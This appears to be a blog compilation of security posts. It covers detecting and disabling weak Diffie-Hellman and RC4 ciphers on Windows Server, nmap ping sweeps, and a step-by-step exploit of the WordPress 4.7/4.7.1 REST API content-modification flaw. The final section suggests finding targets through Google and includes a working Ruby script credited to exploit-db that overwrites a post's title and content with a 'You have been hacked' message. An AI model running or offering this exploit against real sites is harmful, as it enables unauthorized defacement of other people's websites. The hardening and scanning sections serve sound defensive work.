Disable SSL/TLS Diffie-Hellman Modulus 1024 Bits

When a SSL/TLS connection is established using DH <=1024 bits, an attacker could find the shared secret in a short amount of time (depending on modulus size and attacker resources). This may allow an attacker to recover the plain text or potentially violate the integrity of connections.

How to detect vulnerability?

Use nmap

nmap -Pn -p 443 –script ssl-dh-params <IP-address>

nmap DH 1024

 

How to fix vulnerable systems?

  1. Navigate to following path in Registry.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders
\SChannel\KeyExchangeAlgorithms

2. Create new sub key named Diffie-Hellman, if it didn’t already exists.

DH 1024 Bits

3. Create DWORD called Enabled and set 0 value.

Disable SSL RC4 Cipher Suits on Windows Server

Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS) protocols provide integrity, confidentiality and authenticity services to other protocols that lack these features. SSL/TLS protocols use ciphers such as AES, DES, 3DES and RC4 to encrypt the content of the higher layer protocols. However, RC4 is considered as practically vulnerable and RC4 is recommended to be disabled on Server.

How to detect Vulnerability?

Download and use testssl.sh

.testssl.sh –rc4 <ip-address>

testssl.sh rc4

 

How to fix Vulnerable Systems?

  1. Navigate to following path in regedit.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\SecurityProviders\SCHANNEL\Ciphers

2. Create following RC4 sub keys if they do not exists already.

Disable RC4 Cipher on Windows Server

3. Create REG_DWORD called Enabled and set as 0 value for all the 3 RC4 folders.

 

PenTest Tool: Ping Sweep

Ping Sweep is similar to Ping but the difference is the number of IP addresses that can be scanned with these tools. Ping Sweep is used to scan a network or large number of IP addresses to find out how many hosts are Live, where as, Ping is used to scan a single host or IP address.

Ping Sweep and Ping, both, sends out ICMP echo request to host and wait for ICMP echo reply to determine the host status.

Ping Sweep Tools:

nmap command:

-sP option does only Ping scan to determine Live status of host.

c:\Tools\nmap-7.70>nmap.exe -sP 192.168.100.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 11:41 Arab Standard Time
Nmap scan report for 192.168.100.1
Host is up (0.012s latency).
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)
Nmap scan report for 192.168.100.3
Host is up (0.033s latency).
MAC Address: 54:60:09:0D:2E:6E (Google)
Nmap scan report for 192.168.100.8
Host is up (0.043s latency).
MAC Address: 9A:FC:11:B6:6C:BA (Unknown)
Nmap scan report for 192.168.100.18
Host is up (0.081s latency).
MAC Address: C0:9F:05:65:13:99 (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for 192.168.100.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.03 seconds

 

In networks, where ICMP is blocked at the firewall, you certainly cannot use above command to determine the host status. Instead, use TCP sync command to determine host status.

c:\Tools\nmap-7.70>nmap -sS -p80 192.168.100.1
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 12:07 Arab Standard Time
Nmap scan report for 192.168.100.1
Host is up (0.0048s latency).

PORT STATE SERVICE
80/tcp open http
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.45 seconds

GUI Tools: 

There are plenty of GUI tools that does similar job, one among them is ping sweep | pentest-tools.com 

The tool calls Nmap with the proper parameters in order to do the sweeping. Behind the scene, Nmap sends multiple probes to the target systems to provoque responses which could suggest the hosts’ liveness:

  • ICMP echo requests
  • TCP SYN on ports 80,443
  • ICMP timestamp requests

WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.

 

In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.

 

STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.

 

STEP 2: Find VULNERABLE WordPress

View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.

 

STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.

 

STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!

 

Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response = RestClient.post(
“#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}”,
{
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
else
puts “This site is not Vulnerable”
end

source: exploit-db